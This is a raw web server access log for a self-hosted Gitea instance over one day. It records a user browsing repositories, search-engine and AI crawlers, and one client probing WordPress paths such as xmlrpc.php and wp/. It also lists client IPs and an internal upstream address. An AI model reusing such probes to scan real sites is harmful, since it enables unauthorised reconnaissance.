"https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:03:39:35 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 64.23.133.131] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[17/Feb/2026:03:39:35 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 64.23.133.131] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://git.hanmocnn.co.kr/" +[17/Feb/2026:03:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 64.23.133.131] [Length 5678] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[17/Feb/2026:03:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 64.23.133.131] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:06:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 23.27.145.119] [Length 5679] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[17/Feb/2026:07:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11653] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:07:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20269] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11652] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:40:23 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:08:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 222.117.41.51] [Length 26672] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 53] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:08:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:08:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 222.117.41.51] [Length 405210] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:08:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 105] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[17/Feb/2026:09:19:49 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 167.172.221.95] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" +[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 167.172.221.95] [Length 9348] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" +[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//blog/robots.txt" [Client 167.172.221.95] [Length 9347] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" +[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//blog/" [Client 167.172.221.95] [Length 9334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" +[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wordpress/" [Client 167.172.221.95] [Length 9339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" +[17/Feb/2026:09:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "//wp/" [Client 167.172.221.95] [Length 9332] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://gfwm.in//wp-login.php" +[17/Feb/2026:10:44:14 +0000] - 405 405 - POST https git.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr" +[17/Feb/2026:10:44:15 +0000] - 405 405 - POST https git.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr" +[17/Feb/2026:12:58:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:12:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 74.7.227.38] [Length 5663] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[17/Feb/2026:12:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 74.7.227.38] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 74.7.227.38] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 74.7.227.38] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 74.7.227.38] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/sign_up" [Client 74.7.227.38] [Length 4379] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos" [Client 74.7.227.38] [Length 6686] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 74.7.227.38] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/api/swagger" [Client 74.7.227.38] [Length 458] [Gzip 1.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 74.7.227.38] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/licenses.txt" [Client 74.7.227.38] [Length 89511] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/" +[17/Feb/2026:12:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js.4cf15d9a.map" [Client 74.7.227.38] [Length 313113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/assets/js/index.js?v=1.25.3" +[17/Feb/2026:12:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/user/sign_up" +[17/Feb/2026:12:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/forks" [Client 74.7.227.38] [Length 7275] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/forks" [Client 74.7.227.38] [Length 7293] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/repos?language=C%23&q=&sort=recentupdate" [Client 74.7.227.38] [Length 6313] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/forks" [Client 74.7.227.38] [Length 7287] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/stars" [Client 74.7.227.38] [Length 7373] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer" [Client 74.7.227.38] [Length 8146] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/stars" [Client 74.7.227.38] [Length 7371] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer" [Client 74.7.227.38] [Length 15455] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 74.7.227.38] [Length 17172] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations" [Client 74.7.227.38] [Length 5056] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver" [Client 74.7.227.38] [Length 14545] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:12:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/packages" [Client 74.7.227.38] [Length 7389] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:12:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls" [Client 74.7.227.38] [Length 9917] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:12:59:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/" [Client 74.7.227.38] [Length 47] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:12:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer" [Client 74.7.227.38] [Length 15456] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/" +[17/Feb/2026:12:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/actions" [Client 74.7.227.38] [Length 7411] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:12:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/wiki" [Client 74.7.227.38] [Length 7353] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:12:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer.rss" [Client 74.7.227.38] [Length 26276] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:12:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer.atom" [Client 74.7.227.38] [Length 27879] 